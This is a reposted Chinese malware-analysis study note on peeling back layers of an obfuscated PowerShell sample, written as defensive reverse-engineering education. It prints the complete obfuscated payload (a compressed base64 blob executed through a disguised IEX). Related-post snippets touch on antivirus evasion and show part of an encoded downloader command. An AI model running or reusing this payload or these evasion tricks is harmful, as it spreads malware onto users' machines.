powershell脚本编写_病毒分析学习笔记:powershell反混淆

最新推荐文章于 2023-09-15 19:48:56 发布
最新推荐文章于 2023-09-15 19:48:56 发布
阅读量2.3k 收藏 1
点赞数
文章标签: powershell脚本编写
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39631370/article/details/111645737
版权
126423487be57a4290707c57a3736367.png

本文为看雪论坛精华文章

看雪论坛作者ID:OK繃

目录 一、前言 二、自动化反混淆               混淆原理               自动化反混淆工具 三、手动反混淆 四、总结 一、前言

Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。

它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。

Windows PowerShell v3将伴随着Microsoft Hyper-V 3.0和Windows Server 2012发布。PowerShell v3是一个Windows任务自动化的框架,它由一个命令行shell和内置在这个.NET框架上的编程语言组成。

PowerShell v3采用新的cmdlet让管理员能够更深入到系统进程中,这些进程可以制作成可执行的文件或脚本(script)。一条cmdlet是一条轻量命令,Windows PowerShell运行时间在自动化脚本的环境里调用它。

目前在流行的病毒里,还有许多使用了powershell。office宏病毒通过宏代码调用powershell执行恶意行为、powershell无文件挖矿等。

特别是无文件挖矿的反射型注入,被许多人称为老掉牙的技术了,但是在9102年了还有许多用户中招。分析这类powershell病毒时,无法避免的是面对一堆乱码——经混淆的powershell代码。一些经过高度混淆的代码,简直可以称为“非人般的操作”了。

二、自动化反混淆

>>>>

混淆原理

网上帖子太多了,可以参考下看雪论坛用户发的翻译贴:https://bbs.pediy.com/thread-248034.htm

>>>>

自动化反混淆工具

目前搜了搜,网上能自动反混淆的工具

Unit42安全团队编写的PowerShellProfiler.py:

github地址:https://github.com/pan-unit42/public_tools/tree/master/powershellprofiler

用法及原理参考:https://www.freebuf.com/sectool/219057.html

在线解码工具CyberChef:https://gchq.github.io/CyberChef/

使用方法参考:https://www.secpulse.com/archives/109912.html

以上两款工具试着使用了下,一些简单的混淆能够解开,但是一些经过好几层的混淆代码就不太好使了。

三、手动反混淆

上次遇到了一个混淆次数较多,对我来说算得上是“高度混淆”样本,记录一下我的手动反混淆过程。

原混淆代码:

"\"(neW-OBjEcT sySTeM.Io.cOMprEsSIon.deFLaTesTREAm([SYStem.io.mEMorYSTREAM][SYSteM.coNvERT]::fRombaSE64STRing('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') "\" + ([CHAr]44).ToStRInG() + "\" [SYSTeM.IO.CoMPRESsiON.cOMpreSSIonMOde]::DeComPrEss )|% {neW-OBjEcT SYsTeM.iO.streamreadER( `$_"\" + ([CHAr]44).ToStRInG() + "\"[sYstem.TeXt.EncodING]::utf8 )}| % {`$_.rEAdTOEnD( )})| . ( `$pSHome[4]+`$PshOmE[34]+'X')"\" |.( $shEllID[1]+$shelliD[13]+'x')"

7310c229b9f10e3dfbe5166c58ee703b.png

powershell脚本的语言特性,混淆代码在执行时,最终都会被还原为本身的代码。

在这个样本中:

|.( $shEllID[1]+$shelliD[13]+'x')和|.( $pSHome[4]+$PshOmE[34]+'X') == “IEX”命令

通过PowerShell的write-output命令来替换掉IEX或. ((gV 'Mdr').NaMe[3,11,2]-JoIN'')等混淆语句。

“\”符号共有6个,需要成对操作"\" + ([CHAr]44).ToStRInG() + "\" == “,”。

>>>>

第一层

先把IEX的变形命令以及“\”符号直接删掉,并转储为.ps1文件,解出来的1.ps1文件。

9f0664d87b3c8094df77f5ac4da26b97.png

204acda61eb8e9e11b5cd249ae817bb6.png

>>>>

第二层

再次发现IEX的变形命令:| .( $EnV:cOmSPeC[4,24,25]-jOIn'')

以及两个不可识别命令:MnB、ms

该代码已fc为界可分为两部分

第一部分:

直接删除| .( $EnV:cOmSPeC[4,24,25]-jOIn'')命令并转储为2.ps1文件

仍然可见IEX命令

inVokE-EXPReSSioN == IEX

87435d2524d11d3e41fa308b7116d620.png

继续删除并转储为3.ps1。

4f01758c5d9b88817c0f01d7452fafda.png

sal是powershell取别名的函数,就是把rundll32取别名为Qqa。

第二部分:

由第一部分可知在第二部分中的ms、MnB代表IEX和new-object了,在代码中进行替换,并转储为4.ps1:

bbc92a8b48dfc5addd9e0b1a639999cf.png

>>>>

第三层

解码后仍然可见ms指令,删除并转储为5.ps1:

89388155d488cb4032a8586ec394dd23.png

>>>>

第四层

由第三层解出来的可见function h`e(),可先在powershell中定义一下该函数,并删除末尾的ms指令继续转储为6.ps1。

9f3bb5ebeb86d9f83f0b69c76bfcf51f.png

>>>>

第五层

由上层解出来的可见HE()函数,之前在powershell里定义了该函数,可以直接删除ms并转储一下为7.ps1。

ff3144fbef64012dfec990651707e7e3.png

现在解出来的代码勉强可读,需要自己整理一下。看的不清楚的可以自己在powershell中执行一下会更加直观。

四、总结

powershell解混淆其实并不太难,只是刚接触的时候会不太明白,无从入手。而且比较费眼神,“()”等成对出现的符号都要一一配对,否则就会出错。

并且对于通常常用的混淆方法:

b6c459a0854d4b870b691072256342be.png

我们可以直接在powershell里逐条运行,powershell就会反馈给我们它本身的样子。

最后还有大佬们还有什么好的powershell反混淆的方法或者工具吗?这手工反混淆太需要耐心、太费眼睛了。

7fa260dac2f8777cca6ababb85dd3cc8.gif - End - 7310b3bee3656a2483f2543df6499c2d.png

看雪ID:OK繃

https://bbs.pediy.com/user-832445.htm 

*本文由看雪论坛  OK繃  原创,转载请注明来自看雪社区

推荐文章++++

b9112fe135ffd649063797783373b7cc.png

* 实战栈溢出漏洞

* 栈溢出原理和利用

* 堆栈别乱用

* 栈溢出漏洞--GS和DEP

* CVE-2019-0708 bluekeep 漏洞研究分析详细完整版

好书推荐 7d06f7b768eb982fd4058a9206382a70.png ﹀ ﹀ ﹀ ae40f9c473bd431014ea71e1940e7d8b.png 公众号ID:ikanxue 官方微博:看雪安全 商务合作:wsc@kanxue.com e920e2885b3e964f7790ca78fb84384c.gif
weixin_39631370
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MongoDB_PowerShell:用于 MongoDB 的 PowerShell 脚本
05-31
MongoDB_PowerShell MongoDB_PowerShell 是一系列 PowerShell 脚本,可帮助 Windows 开发人员开始使用 MongoDB(就像你的真正的 )快速开始克隆 repo, git clone git://github.... 还查看了一些DevOps样式的脚本来管理...
APT污水 - 使用多阶段高度混淆PowerShell在内存中运行
JiangBuLiu的博客
05-31 4171
通过恶意宏开启多阶段高隐藏攻击链拥有历史传承的社工手法????宏入口UserForm2.Gladiator_CRKUserForm1注册表PowerShell 拥有历史传承的社工手法???? 文档打开后会通过模糊图片和文字欺骗受害者启用宏。宏代码运行后会弹出虚假的提示,表示“由于版本不兼容所以无法查看文档。”等: 污水这个显示效果和文字内容已经使用很久了: 宏 入口 从宏代码的入口就可以发现这个攻击链有一些特殊,并不是所有代码都放在默认的位置一次性执行。先从入口的“Document_Open()”函数执
[论文阅读] (17)CCS2019 针对PowerShell脚本的轻量级去混淆和语义感知攻击检测(经典)
杨秀璋的专栏
03-25 5085
《娜璋带你读论文》系列主要是督促自己阅读优秀论文及听取学术讲座,并分享给大家,希望您喜欢。前一篇总结了Powershell恶意代码检测相关研究,并结合开源工具分享抽象语法树提取过程。这篇文章将详细讲解CCS2019的Powershell混淆工作,这篇文章质量非常高,来自于浙江大学的李振源老师。我将从他在InforSec分享的视频和论文原文阅读两个方面进行讲解。希望这篇文章对您有所帮助,深知自己很菜,通过这种最笨分享来提升和记录,欢迎大家批评指正。这些大佬是真的值得我们去学习,献上小弟的膝盖~
记一次Powershell混淆 (1)
weixin_30896763的博客
03-16 615
样本地址: https://www.virustotal.com/#/file/6f9034646e6fcead5342f708031412e3c2efdb4fb0f37bba43133a471d1cb0e0/detection 样本为一个Word文件,嵌入Macros,寻找命令执行点比较简单, 稍微跟了一下直接定位到 Sub SssbuNrRrEn(UJXYrqZETb As String) O...
Mykings僵尸网络更新基础设施,大量使用PowerShell脚本进行“无文件”攻击挖矿
systemino的博客
05-21 1811
一、概述 MyKings僵尸网络2017 年 2月左右开始出现,该僵尸网络通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机,然后传播包括 DDoS、Proxy(代理服务)、RAT(远程控制木马)、Miner(挖矿木马)、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸网络主动扩散的能力较强,影响范围较广,对企业用户危害严重。 Mykings僵尸网络的主要更新点: 1.新增IP、域名、URL; 2.大量采用POWERSHELL脚本进行“无文件”落地攻击; 3.在清理竞争对手
免杀对抗-PowerShell-混淆+分离
最新发布
xiaoheizi的博客
09-15 560
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
免杀对抗-Powershell-混淆无文件
m0_62172162的博客
04-25 732
免杀对抗-Powershell-混淆无文件
Powershell实现编写和运行脚本
09-21
本文为那些对学习 Windows PowerShell 命令行和脚本编写环境感兴趣的系统管理员提供了资源。也请告诉我们本网站如何才能对您更有用处。
PowerShell脚本引号用法实例:随时随地给代码换行
01-20
为了增强可读性,大家都喜欢将很长的本来可以一行写完的脚本分割成多行。 代码如下: Get-Service | Where-Object { $_.Status -eq ...但是还有一种情况,你可能想随时都可以给脚本换行,可以使用引号(它是PowerS
powershell_interview_prep:使用PowerShell解决的样本面试问题
03-25
powershell_interview_prep:使用PowerShell解决的样本面试问题
chameleon:PowerShell 脚本混淆
08-04
Chameleon 是另一种 PowerShell 混淆工具,旨在绕过 AMSI 和商业防病毒解决方案。 该工具已由开发为项目的 Python 端口。 因此,它使用大部分相同的技术来规避常见的检测特征,例如: 评论删除/替换 字符串替换...
powershell恶意脚本解混淆
信息安全
11-11 1668
文章目录前言分析总结 前言 现在许多病毒作者为了免杀,使用powershell脚本来执行恶意行为的病毒越来越多,这次分析的一个样本就是利用powershell混淆来隐藏嵌在其中的cs后门dll 分析 样本代码 从图上可以很清晰的知道存放了一段base64数据,首先将base64数据解密,使用gzip解压,解压的数据进行执行 想要解密,也很简单: IEX用于将字符串作为命令执行,当去掉IEX后,再文件尾加上| out-file decode.txt 将 IEX (New-Object IO.StreamRe
秒解混淆脚本!混淆神器CyberChef使用指南
热门推荐
weixin_50464560的博客
08-19 1万+
CyberChef是一款强大的编码转换器,集成了多种编码转换的功能,能辅助大家方便快捷地解密出恶意脚本。 概述CyberChef是一款强大的编码转换器,地址在:https://gchq.github.io/CyberChef/它简单易懂易上手,集成了多种编码转换的功能,如:base64加解密、hex转换、char转换、正则表达式等,能辅助大家方便快捷地解密出恶意脚本。其界面如下图,最左边的Operations是转换工具集,把挑选好的工具经过DIY组合及排序拖拽到Recipe中,就可以对Input中的字符串
Ladon九种PowerShell命令混淆加密免杀方法
K8哥哥
11-02 1651
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。 Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。 Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能 管理员想查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。 更新功能 GUI 2020.10.18 [+] PowerShell转EXE,EXE转PowerShell EXE->Powershell PowerS
powershell免杀思路分析
mingyqf的博客
12-14 2612
powershell免杀思路分析 写在前面 powershell做为微软windows系统自带的软件包,具有十分强大的功能,Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的功能,在IT/系统管理员间得到普及。总的特点来说就是:方便、有效和隐蔽。举例来说,利用这些合法工具可以让威胁活动混在正常的网络流量或IT/系统管理工作内,也让这些恶意威胁能够留下较少的痕迹,使得侦测更加困难。在经过各种变形、加密、混淆、恶意文件放在远程服
Powershell学习笔记
来到了学渣的博客
10-16 4582
Powershell的优点 1、PowerShell可以用来管理活动目录 2、Windows7以上的操作系统默认安装 3、很多杀毒软件检测不到PowerShell的活动 4、可以从另外一个系统中下载PowerShell脚本并执行 5、cmd通常会被杀毒软件阻止运行,而PowerShell不会 6、PowerShell无须写到磁盘中,它可以直接在内存中运行。 Powershell的执行策略 Powershell有个安全策略,默认情况下,这个执行策略会被设置受限。 Get-ExecutionPolicy命令可
还原永恒之蓝下载器PS脚本混淆
Sven的忘却日记
04-26 5619
注意:以下代码为真实永恒之蓝木马下载器恶意ps代码,请不要在真实机运行、测试以及调试!!! 下面代码取自了该病毒设置的计划任务 powershell.exe -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAG...
通过DNS TXT记录执行powershell
weixin_34197488的博客
03-08 574
Evi1cg · 2015/10/06 12:140x00简介DNS TXT记录一般用来记录某个主机名或者域名设置的说明,在这里可以填写任何东西,长度限制255。绝大多数的TXT记录是用来做SPF记录(垃圾邮件)。本篇文章主要介绍如何使用nishang通过创建TXT记录执行powershell脚本。当然,首先你要有一个域名。0x01创建TXT记录这里需要使用nishang中的一个脚本OUT-Dn...
powershell脚本编写
04-27
好的,我可以为您提供一些关于 PowerShell 脚本编写的基础知识和指导。 首先,PowerShell 是一种脚本语言,在 Windows 操作系统中广泛使用。它可以用于自动化任务、管理系统和服务器等。 以下是一些编写 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值